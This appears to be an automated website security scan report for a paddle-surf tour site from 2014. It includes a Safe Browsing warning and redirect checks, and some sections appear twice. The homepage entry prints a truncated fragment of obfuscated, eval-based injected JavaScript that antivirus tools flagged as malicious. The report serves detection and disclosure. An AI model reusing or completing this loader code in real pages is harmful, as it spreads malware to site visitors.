Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paddlesurfecotours.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://paddlesurfecotours.com/ | 200 OK Content-Length: 4596 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var s=new String();try{document[0][1]}catch(q){r=1;c=String;}if(r&&document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16 Antivirus reports:
| ||
http://paddlesurfecotours.com/test404page.js | 500 Internal Server Error Content-Length: 773 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paddlesurfecotours.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 22:16:23 GMT
Server: nginx/1.6.2
Content-Length: 4596
Content-Type: text/html
...4596 bytes of data.
GET / HTTP/1.1
Host: paddlesurfecotours.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 22:16:23 GMT
Server: nginx/1.6.2
Content-Length: 4596
Content-Type: text/html
...4596 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: paddlesurfecotours.com
Referer: http://www.google.com/search?q=paddlesurfecotours.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: paddlesurfecotours.com
Referer: http://www.google.com/search?q=paddlesurfecotours.com
Result:
The result is similar to the first query. There are no suspicious redirects found.